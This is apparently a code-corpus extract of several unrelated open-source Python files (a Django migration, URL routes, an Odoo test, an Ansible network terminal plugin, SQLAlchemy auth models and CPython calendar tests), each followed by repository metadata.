'"equal"')
if weights == 'nave':
weights = np.array([e.nave for e in all_tfr], float)
weights /= weights.sum()
else: # == 'equal'
weights = [1. / len(all_tfr)] * len(all_tfr)
weights = np.array(weights, float)
if weights.ndim != 1 or weights.size != len(all_tfr):
raise ValueError('Weights must be the same size as all_tfr')
ch_names = tfr.ch_names
for t_ in all_tfr[1:]:
assert t_.ch_names == ch_names, ValueError("%s and %s do not contain "
"the same channels"
% (tfr, t_))
assert np.max(np.abs(t_.times - tfr.times)) < 1e-7, \
ValueError("%s and %s do not contain the same time instants"
% (tfr, t_))
# use union of bad channels
bads = list(set(tfr.info['bads']).union(*(t_.info['bads']
for t_ in all_tfr[1:])))
tfr.info['bads'] = bads
tfr.data = sum(w * t_.data for w, t_ in zip(weights, all_tfr))
tfr.nave = max(int(1. / sum(w ** 2 / e.nave
for w, e in zip(weights, all_tfr))), 1)
return tfr
| bsd-3-clause | 7,254,544,774,290,642,000 | 37.280726 | 79 | 0.574501 | false |
ojengwa/oh-mainline | mysite/profile/migrations/0026_asheesh_profile_missing_fields.py | 17 | 8009 | # This file is part of OpenHatch.
# Copyright (C) 2009 OpenHatch, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from south.db import db
from django.db import models
from mysite.profile.models import *
class Migration:
def forwards(self, orm):
# Changing field 'Person.time_record_was_created'
db.alter_column('profile_person', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 7, 3, 21, 36, 57, 278003)))
# Changing field 'Link_Person_Tag.time_record_was_created'
db.alter_column('profile_link_person_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 7, 3, 21, 36, 57, 961204)))
# Changing field 'Link_ProjectExp_Tag.time_record_was_created'
db.alter_column('profile_link_projectexp_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 7, 3, 21, 36, 57, 755933)))
# Changing field 'Link_Project_Tag.time_record_was_created'
db.alter_column('profile_link_project_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 7, 3, 21, 36, 57, 866409)))
def backwards(self, orm):
# Changing field 'Person.time_record_was_created'
db.alter_column('profile_person', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 6, 30, 19, 58, 59, 84981)))
# Changing field 'Link_Person_Tag.time_record_was_created'
db.alter_column('profile_link_person_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 6, 30, 19, 58, 58, 588616)))
# Changing field 'Link_ProjectExp_Tag.time_record_was_created'
db.alter_column('profile_link_projectexp_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 6, 30, 19, 58, 58, 771680)))
# Changing field 'Link_Project_Tag.time_record_was_created'
db.alter_column('profile_link_project_tag', 'time_record_was_created', models.DateTimeField(default=datetime.datetime(2009, 6, 30, 19, 58, 59, 213551)))
models = {
'profile.person': {
'gotten_name_from_ohloh': ('models.BooleanField', [], {'default': 'False'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'interested_in_working_on': ('models.CharField', [], {'default': "''", 'max_length': '1024'}),
'last_polled': ('models.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_touched': ('models.DateTimeField', [], {'null': 'True'}),
'name': ('models.CharField', [], {'max_length': '200'}),
'ohloh_grab_completed': ('models.BooleanField', [], {'default': 'False'}),
'password_hash_md5': ('models.CharField', [], {'max_length': '200'}),
'poll_on_next_web_view': ('models.BooleanField', [], {'default': 'True'}),
'time_record_was_created': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 3, 21, 36, 59, 227203)'}),
'username': ('models.CharField', [], {'max_length': '200'})
},
'profile.link_person_tag': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'person': ('models.ForeignKey', ["orm['profile.Person']"], {}),
'source': ('models.CharField', [], {'max_length': '200'}),
'tag': ('models.ForeignKey', ["orm['profile.Tag']"], {}),
'time_record_was_created': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 3, 21, 36, 58, 733233)'})
},
'profile.tag': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'tag_type': ('models.ForeignKey', ["orm['profile.TagType']"], {}),
'text': ('models.CharField', [], {'max_length': '50'})
},
'profile.link_projectexp_tag': {
'Meta': {'unique_together': "[('tag','project_exp','source'),]"},
'favorite': ('models.BooleanField', [], {'default': 'False'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'project_exp': ('models.ForeignKey', ["orm['profile.ProjectExp']"], {}),
'source': ('models.CharField', [], {'max_length': '200'}),
'tag': ('models.ForeignKey', ["orm['profile.Tag']"], {}),
'time_record_was_created': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 3, 21, 36, 59, 15948)'})
},
'profile.sourceforgeperson': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'username': ('models.CharField', [], {'max_length': '200'})
},
'profile.link_project_tag': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'project': ('models.ForeignKey', ["orm['search.Project']"], {}),
'source': ('models.CharField', [], {'max_length': '200'}),
'tag': ('models.ForeignKey', ["orm['profile.Tag']"], {}),
'time_record_was_created': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 3, 21, 36, 58, 919459)'})
},
'profile.sourceforgeproject': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'unixname': ('models.CharField', [], {'max_length': '200'})
},
'search.project': {
'_stub': True,
'id': ('models.AutoField', [], {'primary_key': 'True'})
},
'profile.link_sf_proj_dude_fm': {
'Meta': {'unique_together': "[('person','project'),]"},
'date_collected': ('models.DateTimeField', [], {}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'is_admin': ('models.BooleanField', [], {'default': 'False'}),
'person': ('models.ForeignKey', ["orm['profile.SourceForgePerson']"], {}),
'position': ('models.CharField', [], {'max_length': '200'}),
'project': ('models.ForeignKey', ["orm['profile.SourceForgeProject']"], {})
},
'profile.tagtype': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'name': ('models.CharField', [], {'max_length': '100'}),
'prefix': ('models.CharField', [], {'max_length': '20'})
},
'profile.projectexp': {
'description': ('models.TextField', [], {}),
'favorite': ('models.BooleanField', [], {'default': '0'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'last_touched': ('models.DateTimeField', [], {'null': 'True'}),
'man_months': ('models.PositiveIntegerField', [], {'null': 'True'}),
'person': ('models.ForeignKey', ["orm['profile.Person']"], {}),
'person_role': ('models.CharField', [], {'max_length': '200'}),
'primary_language': ('models.CharField', [], {'max_length': '200', 'null': 'True'}),
'project': ('models.ForeignKey', ["orm['search.Project']"], {}),
'source': ('models.CharField', [], {'max_length': '100', 'null': 'True'}),
'time_record_was_created': ('models.DateTimeField', [], {'null': 'True'}),
'url': ('models.URLField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['profile']
| agpl-3.0 | -1,550,465,198,877,533,000 | 56.207143 | 163 | 0.561119 | false |
slashk/goldstone-server | goldstone/nova/urls.py | 1 | 2240 | """Nova app URLconf."""
# Copyright 2015 Solinea, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf.urls import url, patterns
from goldstone.core.views import SavedSearchViewSet
from .views import AgentsDataView, AggregatesDataView, AvailZonesDataView, \
CloudpipesDataView, FlavorsDataView, FloatingIpPoolsDataView, \
HostsDataView, HypervisorsDataView, NetworksDataView, SecGroupsDataView, \
ServersDataView, ServicesDataView
# Views handled by DjangoRestFramework Views.
urlpatterns = patterns(
'',
url(r'^agents', AgentsDataView.as_view(), name='nova-agents'),
url(r'^aggregates', AggregatesDataView.as_view(), name='nova-aggregates'),
url(r'^availability_zones',
AvailZonesDataView.as_view(),
name='nova-availability-zones'),
url(r'^cloudpipes', CloudpipesDataView.as_view(), name='nova-cloudpipes'),
url(r'^flavors', FlavorsDataView.as_view(), name='nova-flavors'),
url(r'^floating_ip_pools',
FloatingIpPoolsDataView.as_view(),
name='nova-floating-ip-pools'),
url(r'^hosts', HostsDataView.as_view(), name='nova-hosts'),
url(r'^hypervisors',
HypervisorsDataView.as_view(),
name='nova-hypervisors'),
url(r'^networks', NetworksDataView.as_view(), name='nova-networks'),
url(r'^security_groups',
SecGroupsDataView.as_view(),
name='nova-security-groups'),
url(r'^servers', ServersDataView.as_view(), name='nova-servers'),
url(r'^services', ServicesDataView.as_view(), name='nova-services'),
)
# Other views.
urlpatterns += patterns(
'',
url(r'^hypervisor/spawns/', SavedSearchViewSet.as_view(
{'get': 'results'}), {'uuid': '21f5c6db-5a2e-41d4-9462-c3cdc03a837b'})
)
| apache-2.0 | 2,796,624,525,026,355,000 | 41.264151 | 78 | 0.705804 | false |
akretion/odoo | addons/product_margin/tests/test_product_margin.py | 17 | 2867 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import tools
from odoo.tests import common, Form
from odoo.modules.module import get_resource_path
class TestProductMargin(common.TransactionCase):
def create_account_invoice(self, invoice_type, partner, product, quantity=0.0, price_unit=0.0):
""" Create an invoice as in a view by triggering its onchange methods"""
invoice_form = Form(self.env['account.invoice'].with_context(type=invoice_type))
invoice_form.partner_id = partner
with invoice_form.invoice_line_ids.new() as line:
line.product_id = product
line.quantity = quantity
line.price_unit = price_unit
invoice = invoice_form.save()
invoice.action_invoice_open()
return invoice
def test_product_margin(self):
''' In order to test the product_margin module '''
# load account_minimal_test.xml file for chart of account in configuration
tools.convert_file(self.cr, 'product_margin',
get_resource_path('account', 'test', 'account_minimal_test.xml'),
{}, 'init', False, 'test', self.registry._assertion_report)
supplier = self.env['res.partner'].create({'name': 'Supplier', 'supplier': True})
customer = self.env['res.partner'].create({'name': 'Customer', 'customer': True})
ipad = self.env.ref("product.product_product_4")
# Create supplier invoice and customer invoice to test product margin.
# Define supplier invoices
self.create_account_invoice('in_invoice', supplier, ipad, 10.0, 300.00)
self.create_account_invoice('in_invoice', supplier, ipad, 4.0, 450.00)
# Define Customer Invoices
self.create_account_invoice('out_invoice', customer, ipad, 20.0, 750.00)
self.create_account_invoice('out_invoice', customer, ipad, 10.0, 550.00)
result = ipad._compute_product_margin_fields_values()
# Sale turnover ( Quantity * Price Subtotal / Quantity)
sale_turnover = ((20.0 * 750.00) + (10.0 * 550.00))
# Expected sale (Total quantity * Sale price)
sale_expected = (750.00 * 30.0)
# Purchase total cost (Quantity * Unit price)
purchase_total_cost = ((10.0 * 300.00) + (4.0 * 450.00))
# Purchase normal cost ( Total quantity * Cost price)
purchase_normal_cost = (14.0 * 500.00)
total_margin = sale_turnover - purchase_total_cost
expected_margin = sale_expected - purchase_normal_cost
# Check total margin
self.assertEqual(result[ipad.id]['total_margin'], total_margin, "Wrong Total Margin.")
# Check expected margin
self.assertEqual(result[ipad.id]['expected_margin'], expected_margin, "Wrong Expected Margin.")
| agpl-3.0 | -5,859,089,607,675,463,000 | 43.107692 | 103 | 0.640042 | false |
ptisserand/ansible | lib/ansible/plugins/terminal/eos.py | 24 | 3304 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import json
from ansible.plugins.terminal import TerminalBase
from ansible.errors import AnsibleConnectionFailure
from ansible.module_utils._text import to_bytes, to_text
class TerminalModule(TerminalBase):
terminal_stdout_re = [
re.compile(br"[\r\n]?[\w+\-\.:\/\[\]]+(?:\([^\)]+\)){,3}(?:>|#) ?$"),
re.compile(br"\[\w+\@[\w\-\.]+(?: [^\]])\] ?[>#\$] ?$")
]
terminal_stderr_re = [
re.compile(br"% ?Error"),
# re.compile(br"^% \w+", re.M),
re.compile(br"% User not present"),
re.compile(br"% ?Bad secret"),
re.compile(br"invalid input", re.I),
re.compile(br"(?:incomplete|ambiguous) command", re.I),
re.compile(br"connection timed out", re.I),
re.compile(br"[^\r\n]+ not found", re.I),
re.compile(br"'[^']' +returned error code: ?\d+"),
re.compile(br"[^\r\n]\/bin\/(?:ba)?sh"),
re.compile(br"% More than \d+ OSPF instance", re.I)
]
def on_open_shell(self):
try:
for cmd in (b'terminal length 0', b'terminal width 512'):
self._exec_cli_command(cmd)
except AnsibleConnectionFailure:
raise AnsibleConnectionFailure('unable to set terminal parameters')
def on_become(self, passwd=None):
if self._get_prompt().endswith(b'#'):
return
cmd = {u'command': u'enable'}
if passwd:
cmd[u'prompt'] = to_text(r"[\r\n]?password: $", errors='surrogate_or_strict')
cmd[u'answer'] = passwd
cmd[u'prompt_retry_check'] = True
try:
self._exec_cli_command(to_bytes(json.dumps(cmd), errors='surrogate_or_strict'))
prompt = self._get_prompt()
if prompt is None or not prompt.endswith(b'#'):
raise AnsibleConnectionFailure('failed to elevate privilege to enable mode still at prompt [%s]' % prompt)
except AnsibleConnectionFailure as e:
prompt = self._get_prompt()
raise AnsibleConnectionFailure('unable to elevate privilege to enable mode, at prompt [%s] with error: %s' % (prompt, e.message))
def on_unbecome(self):
prompt = self._get_prompt()
if prompt is None:
# if prompt is None most likely the terminal is hung up at a prompt
return
if b'(config' in prompt:
self._exec_cli_command(b'end')
self._exec_cli_command(b'disable')
elif prompt.endswith(b'#'):
self._exec_cli_command(b'disable')
| gpl-3.0 | -7,687,931,931,815,183,000 | 36.545455 | 141 | 0.609262 | false |
837278709/metro-openerp | metro_purchase/wizard/__init__.py | 2 | 1172 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import pur_req_po
import confirm_msg
import pur_history
import pay_po
import pur_invoice
import purchase_order_group
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 8,202,400,713,391,251,000 | 39.413793 | 79 | 0.627986 | false |
nuanri/hiblog | src/database.py | 1 | 2672 | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.ext.declarative import declarative_base
ORMBase = declarative_base()
# DB_URI = 'sqlite:///:memory:'
DB_URI = 'sqlite:///auth.db'
def get_db_session():
dbengine = create_engine(DB_URI, echo=False)
session_factory = sessionmaker(bind=dbengine)
Session = scoped_session(session_factory)
return Session
def create_all():
dbengine = create_engine(DB_URI, echo=True)
ORMBase.metadata.create_all(dbengine)
import datetime
from sqlalchemy.orm import relationship, backref
from sqlalchemy import Table, Column, ForeignKey, Sequence
from sqlalchemy import Integer, String, Boolean, DateTime, Text
def _(s):
return s
class User(ORMBase):
__tablename__ = 'auth_user'
id = Column(Integer, Sequence('auth_user_id_seq'), primary_key=True)
uid = Column(Integer, unique=True, doc=_('User ID'))
username = Column(String(32), unique=True, doc=_('Username'))
password = Column(String(512), doc=_('Password'))
email = Column(String(30), unique=True, doc=_('Email'))
first_name = Column(String(30), doc=_('First Name'))
last_name = Column(String(30), doc=_('Last Name'))
nickname = Column(String(30), doc=_('Nickname'))
gender = Column(Integer, doc=_('Gender'))
is_active = Column(Boolean, default=True, doc=_('User is active'))
is_staff = Column(Boolean, default=False, doc=_('User is staff'))
is_superuser = Column(Boolean, default=False, doc=_('This is super user'))
is_locked = Column(Boolean, default=False, doc=_('User has beed locked'))
language = Column(String(12), default='zh_CN', doc=_('The locale language'))
last_active = Column(DateTime())
last_login = Column(DateTime())
date_joined = Column(DateTime(), default=datetime.datetime.utcnow)
@property
def fullname(self):
return '{} {}'.format(self.first_name, self.last_name)
class Session(ORMBase):
__tablename__ = 'auth_session'
id = Column(Integer, Sequence('auth_session_id_seq'), primary_key=True)
sid = Column(String(128), unique=True)
user_id = Column(Integer, ForeignKey('auth_user.id'))
user = relationship("User", backref='sessions')
from_ip = Column(String(64)) # 当前会话的来源IP, 可增强安全
expired = Column(DateTime())
def is_valid(self):
return datetime.datetime.utcnow() < self.expired
#if __name__ == '__main__':
# create_all()
# 创建新用户测试
'''
u = User(username='abc', password='xxxx')
Session = get_db_session()
db = Session()
db.add(u)
db.commit()
'''
| mit | -3,953,856,435,796,165,000 | 26.154639 | 80 | 0.659074 | false |
mancoast/CPythonPyc_test | fail/330_test_calendar.py | 3 | 37965 | import calendar
import unittest
from test import support
from test.script_helper import assert_python_ok
import time
import locale
import sys
result_2004_01_text = """
January 2004
Mo Tu We Th Fr Sa Su
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
"""
result_2004_text = """
2004
January February March
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 1 2 3 4 5 6 7
5 6 7 8 9 10 11 2 3 4 5 6 7 8 8 9 10 11 12 13 14
12 13 14 15 16 17 18 9 10 11 12 13 14 15 15 16 17 18 19 20 21
19 20 21 22 23 24 25 16 17 18 19 20 21 22 22 23 24 25 26 27 28
26 27 28 29 30 31 23 24 25 26 27 28 29 29 30 31
April May June
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 2 1 2 3 4 5 6
5 6 7 8 9 10 11 3 4 5 6 7 8 9 7 8 9 10 11 12 13
12 13 14 15 16 17 18 10 11 12 13 14 15 16 14 15 16 17 18 19 20
19 20 21 22 23 24 25 17 18 19 20 21 22 23 21 22 23 24 25 26 27
26 27 28 29 30 24 25 26 27 28 29 30 28 29 30
31
July August September
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 1 2 3 4 5
5 6 7 8 9 10 11 2 3 4 5 6 7 8 6 7 8 9 10 11 12
12 13 14 15 16 17 18 9 10 11 12 13 14 15 13 14 15 16 17 18 19
19 20 21 22 23 24 25 16 17 18 19 20 21 22 20 21 22 23 24 25 26
26 27 28 29 30 31 23 24 25 26 27 28 29 27 28 29 30
30 31
October November December
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 1 2 3 4 5 6 7 1 2 3 4 5
4 5 6 7 8 9 10 8 9 10 11 12 13 14 6 7 8 9 10 11 12
11 12 13 14 15 16 17 15 16 17 18 19 20 21 13 14 15 16 17 18 19
18 19 20 21 22 23 24 22 23 24 25 26 27 28 20 21 22 23 24 25 26
25 26 27 28 29 30 31 29 30 27 28 29 30 31
"""
result_2004_html = """
<?xml version="1.0" encoding="%(e)s"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=%(e)s" />
<link rel="stylesheet" type="text/css" href="calendar.css" />
<title>Calendar for 2004</title>
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" class="year">
<tr><th colspan="3" class="year">2004</th></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">January</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="sat">31</td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">February</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sun">1</td></tr>
<tr><td class="mon">2</td><td class="tue">3</td><td class="wed">4</td><td class="thu">5</td><td class="fri">6</td><td class="sat">7</td><td class="sun">8</td></tr>
<tr><td class="mon">9</td><td class="tue">10</td><td class="wed">11</td><td class="thu">12</td><td class="fri">13</td><td class="sat">14</td><td class="sun">15</td></tr>
<tr><td class="mon">16</td><td class="tue">17</td><td class="wed">18</td><td class="thu">19</td><td class="fri">20</td><td class="sat">21</td><td class="sun">22</td></tr>
<tr><td class="mon">23</td><td class="tue">24</td><td class="wed">25</td><td class="thu">26</td><td class="fri">27</td><td class="sat">28</td><td class="sun">29</td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">March</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="mon">1</td><td class="tue">2</td><td class="wed">3</td><td class="thu">4</td><td class="fri">5</td><td class="sat">6</td><td class="sun">7</td></tr>
<tr><td class="mon">8</td><td class="tue">9</td><td class="wed">10</td><td class="thu">11</td><td class="fri">12</td><td class="sat">13</td><td class="sun">14</td></tr>
<tr><td class="mon">15</td><td class="tue">16</td><td class="wed">17</td><td class="thu">18</td><td class="fri">19</td><td class="sat">20</td><td class="sun">21</td></tr>
<tr><td class="mon">22</td><td class="tue">23</td><td class="wed">24</td><td class="thu">25</td><td class="fri">26</td><td class="sat">27</td><td class="sun">28</td></tr>
<tr><td class="mon">29</td><td class="tue">30</td><td class="wed">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">April</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">May</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sat">1</td><td class="sun">2</td></tr>
<tr><td class="mon">3</td><td class="tue">4</td><td class="wed">5</td><td class="thu">6</td><td class="fri">7</td><td class="sat">8</td><td class="sun">9</td></tr>
<tr><td class="mon">10</td><td class="tue">11</td><td class="wed">12</td><td class="thu">13</td><td class="fri">14</td><td class="sat">15</td><td class="sun">16</td></tr>
<tr><td class="mon">17</td><td class="tue">18</td><td class="wed">19</td><td class="thu">20</td><td class="fri">21</td><td class="sat">22</td><td class="sun">23</td></tr>
<tr><td class="mon">24</td><td class="tue">25</td><td class="wed">26</td><td class="thu">27</td><td class="fri">28</td><td class="sat">29</td><td class="sun">30</td></tr>
<tr><td class="mon">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">June</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="tue">1</td><td class="wed">2</td><td class="thu">3</td><td class="fri">4</td><td class="sat">5</td><td class="sun">6</td></tr>
<tr><td class="mon">7</td><td class="tue">8</td><td class="wed">9</td><td class="thu">10</td><td class="fri">11</td><td class="sat">12</td><td class="sun">13</td></tr>
<tr><td class="mon">14</td><td class="tue">15</td><td class="wed">16</td><td class="thu">17</td><td class="fri">18</td><td class="sat">19</td><td class="sun">20</td></tr>
<tr><td class="mon">21</td><td class="tue">22</td><td class="wed">23</td><td class="thu">24</td><td class="fri">25</td><td class="sat">26</td><td class="sun">27</td></tr>
<tr><td class="mon">28</td><td class="tue">29</td><td class="wed">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">July</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="sat">31</td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">August</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sun">1</td></tr>
<tr><td class="mon">2</td><td class="tue">3</td><td class="wed">4</td><td class="thu">5</td><td class="fri">6</td><td class="sat">7</td><td class="sun">8</td></tr>
<tr><td class="mon">9</td><td class="tue">10</td><td class="wed">11</td><td class="thu">12</td><td class="fri">13</td><td class="sat">14</td><td class="sun">15</td></tr>
<tr><td class="mon">16</td><td class="tue">17</td><td class="wed">18</td><td class="thu">19</td><td class="fri">20</td><td class="sat">21</td><td class="sun">22</td></tr>
<tr><td class="mon">23</td><td class="tue">24</td><td class="wed">25</td><td class="thu">26</td><td class="fri">27</td><td class="sat">28</td><td class="sun">29</td></tr>
<tr><td class="mon">30</td><td class="tue">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">September</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
